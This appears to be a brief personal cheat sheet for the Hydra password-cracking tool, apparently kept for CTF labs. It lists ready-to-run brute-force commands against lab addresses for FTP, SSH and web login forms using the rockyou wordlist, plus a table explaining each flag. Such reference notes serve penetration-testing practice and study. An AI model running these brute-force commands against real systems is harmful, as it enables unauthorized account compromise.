Hyrdra
Description
Installation
Usage
Resources
"hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp"
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.226.38 ftp
https://medium.com/@gregIT/exploiting-simple-network-services-in-ctfs-ec8735be5eef
https://attack.mitre.org/techniques/T1210/
hydra -l <username> -P <full path to pass> 10.10.248.5 -t 4 ssh
-l = username
-P = password list
-t = number of threads
Web form: hydra -l <username> -P <wordlist> 10.10.248.5 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
SSH: hydra -l <username> -P <full path to pass> 10.10.248.5 -t 4 ssh
hydra -l molly -P rockyou.txt 10.10.248.5 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
SecLists https://github.com/danielmiessler/SecLists
"hydra -t 16 -l USERNAME -P /usr/share/wordlists/rockyou.txt -vV 10.10.214.108 ssh"
SECTION FUNCTION hydra Runs the hydra tool -t 16 Number of parallel connections per target -l [user] Points to the user who's account you're trying to compromise -P [path to dictionary] Points to the file containing the list of possible passwords -vV Sets verbose mode to very verbose, shows the login+pass combination for each attempt [machine IP] The IP address of the target machine ssh / protocol Sets the protocol
Last updated